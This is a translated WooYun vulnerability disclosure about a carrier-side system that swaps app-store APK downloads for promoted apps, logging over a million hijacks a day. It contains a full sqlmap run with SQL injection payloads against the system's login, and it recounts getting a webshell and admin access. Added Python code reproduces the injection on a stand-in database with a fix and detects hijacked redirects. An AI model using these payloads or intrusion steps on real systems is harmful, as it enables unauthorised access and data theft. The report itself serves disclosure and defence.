
Vulnerability summary

Defect ID: wooyun-2016-0168329

Title: Suspected vulnerability in an APK hijacking and promotion system that rides on carrier traffic (hijack statistics running to over a million records a day)

Vendor: a regional carrier

Author: 路人甲

Submitted: 2016-01-08 13:52

Fixed: 2016-02-22 16:48

Published: 2016-02-22 16:48

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2016-01-08: details sent to the vendor, awaiting the vendor's handling
2016-01-12: vendor confirmed; details disclosed to the vendor only
2016-01-22: details disclosed to core white hats and experts in the relevant field
2016-02-01: details disclosed to regular white hats
2016-02-11: details disclosed to intern white hats

Brief description:

It started when a friend from Tangshan mentioned in a chat group that whenever he downloaded the Xiaomi app store, from a phone or from a PC, the file that landed on disk was 『UCBrowserV10.9.0.703androidpf145bi800_(Build151211143335).apk』, the UC Browser.
While capturing the traffic we stumbled on an entire management system, so, well, we had a look.

Detailed description:

Downloading the Xiaomi app store turns into UC Browser, as shown:

[image: 14521577283171.jpg]


During the packet capture the download link for UC Browser turned out to be:

**.**.**.**:81/Handler.ashx?ID=tangshan&u=aHR0cDovL2ZpbGUubWFya2V0LnhpYW9taS5jb20vZG93bmxvYWQvQXBwU3RvcmUvMGZlNzg1OGIyZTY3NDcwODI3NDdiODgxYjQzMjg4ODkxOTk0MmU2YzIvY29tLnhpYW9taS5tYXJrZXRfUi4xLjQuNS5hcGs=


The u parameter is a base64-encoded (not encrypted) string; decoded, it is the official download URL of the Xiaomi app store:

http://**.**.**.**/download/AppStore/0fe7858b2e6747082747b881b432888919942e6c2/com.xiaomi.market_R.1.4.5.apk


Testing shows that the link above hands back UC Browser no matter what the u parameter contains:

curl -I "**.**.**.**:81/Handler.ashx?ID=tangshan&u=aHR0cDovL2ZpbGUubWFya2V0LnhpYW9taS5jb20vZG93bmxvYWQvQXBwU3RvcmUvMGZlNzg1OGIyZTY3NDcwODI3NDdiODgxYjQzMjg4ODkxOTk0MmU2YzIvY29tLnhpYW9taS5tYXJrZXRfUi4xLjQuNS5hcGs="
HTTP/1.1 302 Found
Date: Thu, 07 Jan 2016 09:59:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Location: http://**.**.**.**/down1/gongyp/kbllq7/UCBrowser_V**.**.**.**_android_pf145_bi800_(Build151231101345).apk
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 221


Browsing to **.**.**.**:81/ directly shows what calls itself an 『installation distribution platform』, which sounds like a distribution channel for Android apps; by all appearances this is the system doing the swapping:

[image: 14521578019217.jpg]


So we tested that system and found that the login endpoint is SQL injectable, and that the captcha value is written into a cookie, so one captured value can be replayed indefinitely. Straight into sqlmap:

./sqlmap.py -u "**.**.**.**:81/Ajax/LoginVal.aspx?userid=admin*&pwd=111111&code=cq70" --dbms mssql --cookie "Kuaibu_Code=CQ70"
sqlmap {1.0-dev-03160d9} http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 14:28:46
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[14:28:48] [INFO] testing connection to the target URL
[14:28:48] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[14:28:48] [INFO] testing if the target URL is stable
[14:28:49] [INFO] target URL is stable
[14:28:49] [INFO] testing if URI parameter '#1*' is dynamic
[14:28:49] [INFO] confirming that URI parameter '#1*' is dynamic
[14:28:49] [INFO] URI parameter '#1*' is dynamic
[14:28:49] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'Microsoft SQL Server')
[14:28:49] [INFO] testing for SQL injection on URI parameter '#1*'
for the remaining tests, do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1) values? [Y/n] y
[14:28:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:28:56] [INFO] URI parameter '#1*' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[14:28:56] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[14:28:56] [INFO] URI parameter '#1*' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable
[14:28:56] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[14:28:56] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[14:28:56] [WARNING] time-based comparison requires larger statistical model, please wait...............
[14:29:07] [INFO] URI parameter '#1*' seems to be 'Microsoft SQL Server/Sybase stacked queries (comment)' injectable
[14:29:07] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[14:29:09] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (comment)'
[14:29:20] [INFO] URI parameter '#1*' seems to be 'Microsoft SQL Server/Sybase time-based blind (comment)' injectable
[14:29:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:29:20] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[14:29:23] [WARNING] reflective value(s) found and filtering out
[14:29:23] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[14:29:26] [INFO] target URL appears to have 7 columns in query
[14:29:26] [WARNING] combined UNION/error-based SQL injection case found on column 6. sqlmap will try to find another column with better characteristics
[14:29:27] [WARNING] combined UNION/error-based SQL injection case found on column 1. sqlmap will try to find another column with better characteristics
[14:29:27] [INFO] URI parameter '#1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 47 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: **.**.**.**:81/Ajax/LoginVal.aspx?userid=admin' AND 7367=7367 AND 'XdzV'='XdzV&pwd=111111&code=cq70
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: **.**.**.**:81/Ajax/LoginVal.aspx?userid=admin' AND 5693=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(106)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (5693=5693) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(98)+CHAR(118)+CHAR(113))) AND 'elKA'='elKA&pwd=111111&code=cq70
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: **.**.**.**:81/Ajax/LoginVal.aspx?userid=admin';WAITFOR DELAY '0:0:5'--&pwd=111111&code=cq70
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: **.**.**.**:81/Ajax/LoginVal.aspx?userid=admin' WAITFOR DELAY '0:0:5'--&pwd=111111&code=cq70
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: **.**.**.**:81/Ajax/LoginVal.aspx?userid=admin' UNION ALL SELECT CHAR(113)+CHAR(112)+CHAR(106)+CHAR(122)+CHAR(113)+CHAR(108)+CHAR(115)+CHAR(118)+CHAR(65)+CHAR(87)+CHAR(109)+CHAR(71)+CHAR(85)+CHAR(119)+CHAR(76)+CHAR(117)+CHAR(81)+CHAR(68)+CHAR(120)+CHAR(67)+CHAR(78)+CHAR(118)+CHAR(110)+CHAR(89)+CHAR(106)+CHAR(70)+CHAR(65)+CHAR(97)+CHAR(70)+CHAR(116)+CHAR(68)+CHAR(76)+CHAR(110)+CHAR(116)+CHAR(79)+CHAR(98)+CHAR(88)+CHAR(66)+CHAR(108)+CHAR(70)+CHAR(90)+CHAR(67)+CHAR(114)+CHAR(103)+CHAR(109)+CHAR(113)+CHAR(122)+CHAR(98)+CHAR(118)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL-- -&pwd=111111&code=cq70
---
[14:29:53] [INFO] testing Microsoft SQL Server
[14:29:53] [INFO] confirming Microsoft SQL Server
[14:29:54] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[14:29:54] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 20 times
[14:29:54] [INFO] fetched data logged to text files under '/Users/***/.sqlmap/output/**.**.**.**'
[*] shutting down at 14:29:54
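An added illustration, not the platform's code (the LoginVal.aspx source was never seen), of why sqlmap obtains a boolean oracle at this endpoint and how the two defects are closed. It assumes the handler looks the user up by name with string concatenation and then compares the password in code, and that the captcha is validated against the client-supplied Kuaibu_Code cookie; the table, user and password are constructed. SQLite stands in for SQL Server, so the MSSQL-only payloads in the sqlmap output (WAITFOR DELAY, CONVERT(INT, ...)) are not reproduced; the boolean-based payload is run exactly as sqlmap sent it.

```python
import hashlib
import secrets
import sqlite3

# Constructed stand-in for the platform's admin table. The real schema and its
# "custom encryption" of passwords are unknown; a plain SHA-256 is used here.
DB = sqlite3.connect(":memory:")
DB.execute("CREATE TABLE Admin (ID INTEGER PRIMARY KEY, UserID TEXT, Pwd TEXT)")
DB.execute("INSERT INTO Admin VALUES (1, 'admin', ?)",
           (hashlib.sha256(b"correct horse").hexdigest(),))


def _pwd_ok(stored, supplied):
    return secrets.compare_digest(stored, hashlib.sha256(supplied.encode()).hexdigest())


def login_vulnerable(userid, pwd, code, cookie_code):
    """Assumed shape of Ajax/LoginVal.aspx: the captcha is compared with a value the
    client itself carries in the Kuaibu_Code cookie, and the user name is spliced
    into the SQL text. Each outcome yields a different message, which is the oracle
    sqlmap's boolean-based test relied on."""
    if code.upper() != cookie_code.upper():     # client controls both sides of this check
        return "bad captcha"
    sql = f"SELECT ID, Pwd FROM Admin WHERE UserID='{userid}'"
    try:
        row = DB.execute(sql).fetchone()
    except sqlite3.Error as exc:                # error text leaks too (error-based injection)
        return f"error: {exc}"
    if row is None:
        return "no such user"
    return "ok" if _pwd_ok(row[1], pwd) else "wrong password"


# Hardened version: a one-time captcha kept server-side per session, the user
# name passed as a bound parameter, and one message for every failure.
SERVER_CAPTCHAS = {}


def issue_captcha(session_id):
    code = secrets.token_hex(2)
    SERVER_CAPTCHAS[session_id] = code
    return code


def login_fixed(userid, pwd, code, session_id):
    expected = SERVER_CAPTCHAS.pop(session_id, None)   # consumed on first use
    if expected is None or not secrets.compare_digest(code.lower(), expected.lower()):
        return "bad captcha"
    row = DB.execute("SELECT ID, Pwd FROM Admin WHERE UserID=?", (userid,)).fetchone()
    if row is None or not _pwd_ok(row[1], pwd):
        return "denied"                         # no hint whether the WHERE clause matched
    return "ok"


if __name__ == "__main__":
    true_payload = "admin' AND 7367=7367 AND 'XdzV'='XdzV"   # from the sqlmap output above
    false_payload = "admin' AND 7367=7368 AND 'XdzV'='XdzV"
    for p in (true_payload, false_payload):
        print(repr(p), "->", login_vulnerable(p, "111111", "cq70", "CQ70"))
    sid = "sess-1"
    print("fixed, first use:", login_fixed("admin", "x", issue_captcha(sid), sid))
    print("fixed, replayed :", login_fixed("admin", "x", "0000", sid))
```

With the vulnerable handler the true and false payloads come back as "wrong password" and "no such user", which is all a blind injection needs; with the parameterised query both come back as "denied", and the captcha is gone after its first use.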


However, the admin account passwords obtained through the injection were stored with a custom encryption scheme, so we set the back end aside for the moment and went for a shell instead. The database user was not dba, but with the help of a certain colleague a webshell was obtained easily.

[image: 14521610448018.jpg]


BTW: while we were getting access, port 81 suddenly became unreachable; a scan showed port 84 open and running the same system, which is why the webshell in the screenshot above is on port 84.
A quick look through the database structure: they call this kind of hijacking a "redirect" (跳转), every redirect is written to the database, and the records are split into one table per day.

[image: 14521612414181.jpg]


Querying the RedirectRecord_20160106 table, the records look like this:

ID	KeywordUrl_ID	LinkID	KeyType	LinkName	KeyName	FromUrl	FromIp	RedirectUrl	RedirectTime
1516444 21 15 其他跳转 tangshan sss http://**.**.**.**/myapp/gjbig/packmanage/34/2/3/105047/KingMaster_v**.**.**.**_c136_70A6099CB6CF3F97_2015-12-24_105047.apk **.**.**.** http://**.**.**.**/down1/gongyp/kbllq/UCBrowser_V**.**.**.**_android_pf145_bi800_(Build151211143335).apk 01/06/2016 01:25:21
1516436 21 15 其他跳转 tangshan sss **.**.**.**/cache/**.**.**.**/download/AppStore/0c67d41f51b7b9186d776df76eb2e0e540143b1fa/%E5%BF%AB%E6%89%8B_**.**.**.**_669.apk?ich_args=5f85a51ec0dafb877cf1588864b30d0d_1048_0_0_14_b0659a6f93f4fc260ebd987cb904216b97378fd0ed64de08c1e6a5d9b0eae411_47a8607d034746fc31acb1017a36bf83_1_0&ich_ip=39-244 **.**.**.** http://**.**.**.**/down1/gongyp/kbllq/UCBrowser_V**.**.**.**_android_pf145_bi800_(Build151211143335).apk 01/06/2016 01:25:20


The key fields are FromUrl, FromIp, RedirectUrl and RedirectTime. From them, the second record reads: the user at IP **.**.**.** requested an app from the Xiaomi store at **.**.**.**/cache/**.**.**.**/download/AppStore/0c67d41f51b7b9186d776df76eb2e0e540143b1fa/%E5%BF%AB%E6%89%8B_**.**.**.**_669.apk?ich_args=5f85a51ec0dafb877cf1588864b30d0d_1048_0_0_14_b0659a6f93f4fc260ebd987cb904216b97378fd0ed64de08c1e6a5d9b0eae411_47a8607d034746fc31acb1017a36bf83_1_0&ich_ip=39-244 and was redirected to the UC Browser at http://**.**.**.**/down1/gongyp/kbllq/UCBrowser_V**.**.**.**_android_pf145_bi800_(Build151211143335).apk.
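An added example, not part of the original report, that puts the two observations above into one check: it decodes the base64 u parameter of a Handler.ashx request and compares it with the 302 Location, and applies the same FromUrl-versus-RedirectUrl test to rows in the RedirectRecord_YYYYMMDD layout, including the scheme-less FromUrl values and the percent-encoded file name seen in the table. Host names (redirector.invalid, dist.invalid, store-a.invalid, cache.invalid) and the sample rows are constructed, because the report redacts them; only the base64 string is taken from the captured download link.

```python
import base64
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit


def _split(url):
    """urlsplit that also copes with the scheme-less FromUrl values in the table."""
    if "://" not in url:
        url = "http://" + url
    return urlsplit(url)


def decode_u(handler_url):
    """Recover the URL carried in the handler's base64 `u` parameter."""
    u = parse_qs(_split(handler_url).query)["u"][0]
    u += "=" * (-len(u) % 4)          # restore padding if an intermediary stripped the '='
    return base64.b64decode(u).decode("utf-8")


def apk_name(url):
    """Last path component, percent-decoded, with any query string dropped."""
    return unquote(_split(url).path.rsplit("/", 1)[-1])


def is_hijacked(from_url, redirect_url):
    """True when the file actually served is not the file the client asked for."""
    src, dst = _split(from_url), _split(redirect_url)
    return src.netloc.lower() != dst.netloc.lower() or apk_name(from_url) != apk_name(redirect_url)


def handler_hijacks(handler_url, location_header):
    """Same test for a Handler.ashx request and the Location header of its 302."""
    return is_hijacked(decode_u(handler_url), location_header)


def hijack_stats(records):
    """records: (FromUrl, RedirectUrl) pairs as stored in RedirectRecord_YYYYMMDD.
    Returns how many genuine swaps there were per APK served; rows whose request
    already pointed at the promoted file are not counted."""
    return Counter(apk_name(dst) for src, dst in records if is_hijacked(src, dst))


# Constructed inputs: hosts are placeholders; the base64 value is the one from
# the captured download link above.
HANDLER_URL = ("http://redirector.invalid:81/Handler.ashx?ID=tangshan&u="
               "aHR0cDovL2ZpbGUubWFya2V0LnhpYW9taS5jb20vZG93bmxvYWQvQXBwU3RvcmUvMGZlNzg1OGIyZTY3"
               "NDcwODI3NDdiODgxYjQzMjg4ODkxOTk0MmU2YzIvY29tLnhpYW9taS5tYXJrZXRfUi4xLjQuNS5hcGs=")
LOCATION = "http://dist.invalid/down1/gongyp/kbllq7/UCBrowser_android_pf145_bi800.apk"
SAMPLE_RECORDS = [
    ("http://store-a.invalid/myapp/gjbig/packmanage/KingMaster_c136.apk",
     "http://dist.invalid/down1/gongyp/kbllq/UCBrowser_android_pf145_bi800.apk"),
    ("cache.invalid/download/AppStore/%E5%BF%AB%E6%89%8B_669.apk?ich_args=x&ich_ip=39-244",
     "http://dist.invalid/down1/gongyp/kbllq/UCBrowser_android_pf145_bi800.apk"),
    # the oddity noted in the PS further down: the requested file is already the promoted app
    ("http://dist.invalid/down1/gongyp/kbllq/UCBrowser_android_pf145_bi800.apk",
     "http://dist.invalid/down1/gongyp/kbllq/UCBrowser_android_pf145_bi800.apk"),
]

if __name__ == "__main__":
    print("requested:", decode_u(HANDLER_URL))
    print("served   :", LOCATION, "(hijacked)" if handler_hijacks(HANDLER_URL, LOCATION) else "(pass-through)")
    print(hijack_stats(SAMPLE_RECORDS))
```

Run against a day's RedirectRecord table, hijack_stats gives the number of real swaps rather than the raw row count, which is the figure the per-day totals below overstate if self-redirects are included.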
Row counts per daily table:

Date		Hijack count
20151228 642857
20151229 792764
20151230 829208
20151231 974141
20160101 968162
20160102 802980
20160103 751637
20160104 893009
20160105 1200640
20160106 1516445
20160107 972950


Hijacked downloads run to over a million a day; at that rate the install base of any app pushed this way becomes frightening.
Using the webshell we decrypted the stored password and logged into the back end, whose functionality is fairly simple:

[image: 14521623885735.jpg]


The page lists tianjin, tangshan and sichuan, which look like pinyin region names. Remember the friend from Tangshan mentioned earlier? Is hijacking applied only to IPs from these regions? Spot checks of the database records support that guess.
Opening the "manage redirect" action on the tangshan entry shows the following:

[image: 14521628445489.jpg]


[image: 14521626758833.jpg]


[image: 14521626863151.jpg]


So besides UC Browser, other vendors also promote their own apps through this hijacking system, for example Baidu Mobile Guard, 360 Safe Guard and iQIYI.
PS: one odd thing: some hijacked links already point at the vendor's own app, and are still redirected to that same app. Is the platform inflating hijack counts to bill the vendors?

Proof of vulnerability:

See the detailed description above.

Fix recommendation:

I don't know how to fix it.

Copyright notice: reproduction must credit 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2016-01-12 17:00

Vendor reply:

CNVD did not directly reproduce the situation described; the case has been forwarded through CNCERT to China Telecom, China Mobile and China Unicom (China United Network Communications Group). Based on their feedback, China Telecom has taken over the follow-up handling.

Latest status:

None yet